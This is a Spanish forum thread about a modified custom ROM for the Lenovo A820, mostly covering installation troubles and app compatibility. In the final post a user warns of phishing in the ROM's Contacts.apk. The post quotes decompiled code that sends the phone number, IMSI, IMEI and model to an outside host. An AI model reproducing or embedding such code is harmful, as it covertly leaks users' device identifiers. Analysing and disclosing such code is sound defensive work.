![]() |
|
| ROMs y accesorios Lenovo A820 ROMs y accesorios Lenovo A820 |
«
Tema Anterior
|
Siguiente tema
»
|
|
Herramientas |
|
|
||||
|
||||
|
ROM MODIFICADA LENOVO A820 CASTELLANO V1 (Chees2001)
Gracias a nuestro compañero CHEES2001 del foro MÓVILES DUAL SIM, aquí os dejo el enlace a su post sobre la ROM para LENOVO A820
:http://www.movilesdualsim.com/foro/t...1-Espa%C3%B1ol GRACIAS PARA ÉL, NO PARA MÍ. ![]() ![]() ![]() ![]() ![]() Yo estoy a la espera de que me llegue el móvil. En cuanto lo tenga, le instalo esta ROM. Última edición por htcmania201239 Día 28/04/13 a las 13:47:42 |
|
|
|
|
||||
|
||||
|
Gracias. Aunque creo que ya se habla de ello en otro hilo, siempre es bueno tener varias fuentes de información.
Saludos |
|
|
|
Ayer le puse la Rom, se instala bien pero al reinciar siempre se queda bloqueado en la animación de inicio, se queda la pantalla a rallas y se bloquea... asi hasta 4 veces que la probé instalar; ahora llevo puesta una rom de needrom.com, pero no está en castellano..
|
|
|
||||
|
||||
|
Buenas, eso mismo me paso a mi: instalaba la ROM de chees y se quedaba en el logo de lenovo. Asustao probe con una de needRom '-la del 21/04- y al ver que funcionó, volvi a instalar la de chees y esta vez si.
![]() ![]() Por cierto, va de autentico lujazo esta ROM, mil gracias por el trabajo!!
|
|
|
|
|
Cita:
P.d: sabes si trae playstore? |
|
|
||||
|
||||
|
A mi también me pasaba lo mismo se me quedaba en el logo de lenovo, pero a la cuarta por arte de magia se instalo
Ya digo el creador de la ROM que daba problemas con el cwm. Yo la instale desde el recovery chino que traía haciendo full wipe y dalvin cache y luego instalando zip desde sd. |
|
|
|
|
Cita:
Luego lo pruebo, que sera la quinta... sabes si va el play store? |
|
|
||||
|
||||
|
La cosa es que a mi me vino el telefono de antelife ya con una rom modificada - podia seleccionar español - y con un recovery en chino pero que parecia que estaba tambien modificado, salia algo asi como ydss.com en el recovery.
Lo que hice fue instalarme el mobile uncle tools desde la play store, q ya me venian instaladas por defecto en la rom que me habian instalado los de antelife. Y desde el el mobile uncle instale el recovery que proporcionaba chees en el fichero, el TWRP. Hasta aqui todo perfecto. Una vez en el recovery lo primero que hice fue instalar la rom de chees, una vez instalada, haciendo los wipes y seteando los permisos de root al final de todo, al reiniciar se me quedaba en el logo de lenovo. Lo dejaba tiempo y nada. Lo que hice ya asustado fue bajarme una rom de las de needrom, la del 21/4, y la instaló sin problemas. Despues de ver que no habia roto nada, volvia a intentar instalar la rom de chees y voilá. Para mas inri, pedi dos telefonos iguales, y ya con esta experiencia al segundo telefono fue tan simple como: - Instalar el TWRP, en mi caso por el mobile uncle tools - Instalar la room de needrom '21/04' esa (haciendo wipe de cache y dalvik antes de instalarla) - Instalar la room de chees (haciendo wipe de cache y dalvik antes de instalarla) - Restore a valores de fabrica por defecto - Tirar millas. Asi de facil, espero que tengas suerte. Cierto es que en mi caso ya venia previamente rooteado el telefono, con google play y con un recovery distinto. |
|
|
||||
|
||||
|
Instalada y funcionando.
Gracias a chess2001. |
|
|
||||
|
||||
|
Tengo una duda, respecto a algunos juegos como el plantas vs zombies, no me deja jugarlos por que me dice que no es compatible con el dispositivo. Vale la pena cambiar el build.prop y poner que el dispositivo es un galaxy S3 por ejemplo? No habrá problemas al iniciafse ni nada? Tengo esta Rom
|
|
|
||||
|
||||
|
algun sitio para bajarla que no sea el servidor este q baja a 2kbps...???
|
|
|
||||
|
||||
|
Yo la tengo instalada, pero tengo 1 problema , algunas app son borradas al reiniciar el telefono. creo que es por que detecta la SD como memoria interna y se hace el movil un lio...
En casa tenemos 2 a820 con la rom cheez2001 y a los 2 nos pasa lo mismo ¿Alguna idea? Thx !! |
|
|
||||
|
||||
|
Le he regalado a mi madre el móvil y yo no puedo explicarle todo porque no vivimos en la misma casa, no sabreis si hay instrucciones por la red en ingles o español porque solo te las traen en chino logico y normal
|
|
|
||||
|
||||
|
Creo que hay phishing en la aplicacion Contacts.apk.
NO RECOMIENDO NINGUNA ROM DE chees2001. Analizad vuestro móvil con TrustGo: https://play.google.com/store/apps/d...security&hl=es Yo analicé el código de Contacts.apk y veo lo siguiente: Código:
try
{
this.myWebView.getSettings().setJavaScriptEnabled(true);
this.myWebView.setWebViewClient(this.viewClient);
DotInfoBean localDotInfoBean = DotInfoClient.queryDotUrlInfo(getContentResolver());
if (localDotInfoBean == null)
{
LOG.debug(TAG, "dotinfo is null");
finish();
}
this.number = getIntent().getStringExtra("number");
LOG.debug(TAG, "number" + this.number);
this.dotCommUrl = localDotInfoBean.dotCommUrl;
if (TextUtils.isEmpty(this.dotmatch))
this.dotCommUrl = "http://a.zqlx.com:8200/dotinf";
this.imsi = localDotInfoBean.imsi;
this.webUrl = (this.dotCommUrl + "?p=" + this.number + "&" + "imsi=" + this.imsi + "&imei=" + localDotInfoBean.imei + "&" + "an=" + localDotInfoBean.an + "&" + "adccompany=" + localDotInfoBean.adccompany + "&" + "model=" + localDotInfoBean.model);
LOG.debug(TAG, "webUrl:" + this.webUrl);
this.dmUrl = ("&an=" + localDotInfoBean.an + "&" + "av=" + localDotInfoBean.av + "&" + "adccompany=" + localDotInfoBean.adccompany + "&imei=" + localDotInfoBean.imei + "&" + "model=" + localDotInfoBean.model + "&" + "ct=" + "company");
this.dotMediaUrl = localDotInfoBean.dotMediaUrl;
if (TextUtils.isEmpty(this.dotMediaUrl))
this.dotMediaUrl = "http://a.zqlx.com:8200/dldi";
LOG.debug(TAG, "dotMediaUrl:" + this.dotMediaUrl);
this.dotmatch = localDotInfoBean.dotmatch;
if (TextUtils.isEmpty(this.dotmatch))
this.dotmatch = "winksidotcoupon,zdwsdotcoupon";
LOG.debug(TAG, "dotmatch:" + this.dotmatch);
this.myWebView.loadUrl(this.webUrl);
return;
|
| Respuesta |
Estás aquí
|